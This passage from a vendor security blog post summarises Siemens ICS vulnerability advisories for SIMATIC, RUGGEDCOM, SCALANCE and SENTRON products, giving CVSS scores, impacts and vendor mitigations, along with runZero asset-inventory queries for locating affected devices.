  • SSA-629254 – remote code execution vulnerability in SIMATIC SCADA and PCS 7 systems (CVSS score 9.1)
  • SSA-455250 – multiple vulnerabilities in RUGGEDCOM devices (CVSS score 9.8)
  • SSA-039007 – heap-based buffer overflow in the Siemens User Management Console component (CVSS score 9.8)

The disclosed vulnerabilities range in severity. For the most critical vulnerabilities, unauthenticated remote attackers could execute arbitrary code and completely take over a vulnerable system. Successful exploitation of other disclosed vulnerabilities could result in denial-of-service conditions or disclosure of sensitive information.

For most of the disclosed vulnerabilities, Siemens has released updates or patches. However, some vulnerabilities mentioned above, including some critical vulnerabilities, do not have patches released and it is unclear when such updates would be available. Siemens recommends that all systems be kept behind firewalls and have unnecessary services disabled.

How to find potentially vulnerable systems

From the Asset Inventory, use the following query to locate systems running potentially vulnerable software:

vendor:Siemens

SCALANCE and RUGGEDCOM products (August 2024)

Siemens disclosed multiple vulnerabilities for a variety of products and devices, including the SCALANCE and RUGGEDCOM product lines.

  • CVE-2024-41976 is rated high, with a CVSS score of 7.2, and allows an attacker to issue invalid VPN configuration data causing an authenticated attacker to execute arbitrary code.
  • CVE-2024-41977 is rated high, with a CVSS score of 7.1, and allows an attacker to escalate their privileges due to devices not properly enforcing user session isolation.
  • CVE-2024-41978 is rated high, with a CVSS score of 6.5, and allows an authenticated attacker to forge 2FA tokens of other users due to devices storing sensitive 2FA information in log files on disk.
  • CVE-2024-44321 is rated medium, with a CVSS score of 2.7, and allows an attacker to issue large input data causing an unauthenticated denial-of-service.

Successful exploitation of this vulnerability would allow an authenticated attacker to remotely execute code, escalate their privileges, or forge other users credentials. The first three do require attacks be authenticated initially to exploit these vulnerabilities.

The last vulnerability is on the lower score, but would still require the device be restarted if the denial-of-service condition was triggered.

Siemens recommends upgrading all affected devices to firmware V8.1 or later. Additionally, users should ensure these devices are isolated in their own networks to prevent unwanted network traffic to the device.

How to find potentially vulnerable systems

From the Asset Inventory, use the following query to locate systems running potentially vulnerable software:

hw:"RUGGEDCOM" OR hw:"SCALANCE" OR hw:"LOGO"

CVE-2024-35292 – SIMATIC S7-200 SMART Devices (July 2024)

In July 2024, Siemens disclosed a vulnerability in their SIMATIC S7-200 SMART Devices.

CVE-2024-35292 is rated high, with a CVSS score of 8.2, and allowed attackers to predict IP ID sequence numbers as their base method of attack and eventually could allow an attacker to create a denial-of-service condition.

Successful exploitation of this vulnerability would allow an attacker to issue a denial-of-service condition.

The only workaround was to restrict access to the network where the affected products were located by introducing strict access control mechanisms.

How to find potentially vulnerable systems

From the Asset Inventory, runZero users applied the following query to locate systems running potentially vulnerable software:

hw:SIMATIC

 

SENTRON, SCALANCE, and RUGGEDCOM vulnerabilities (March 2024)

In March, 2024, Siemens released security advisories for a variety of products and devices, including the SENTRON, SCALANCE, and RUGGEDCOM product lines.

Several of the vulnerabilities had CVSS scores in the 7.0 to 8.9 range (high) and several more in the 9.0 to 10.0 range (critical).

For the full list of vulnerabilities, you can consult Siemens ProductCERT.

Several of these vulnerabilities allowed for unauthenticated remote code execution, allowing for compromise of the vulnerable systems. Other vulnerabilities could lead to privilege escalation, information disclosure, or denial of service. Users were urged to upgrade as quickly as possible.

Siemens released updates via a variety of channels. See Siemens ProductCERT for details.

How to find potentially vulnerable systems

From the Asset Inventory, runZero users applied the following query to locate Siemens assets that were potentially vulnerable:

hardware:Siemens OR hardware:RuggedCom

 

About runZero
runZero, a network discovery and asset inventory solution, was founded in 2018 by HD Moore, the creator of Metasploit. HD envisioned a modern active discovery solution that could find and identify everything on a network–without credentials. As a security researcher and penetration tester, he often employed benign ways to get information leaks and piece them together to build device profiles. Eventually, this work led him to leverage applied research and the discovery techniques developed for security and penetration testing to create runZero.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

×

Hello!

Click one of our contacts below to chat on WhatsApp

Social Chat is free, download and try it now here!

×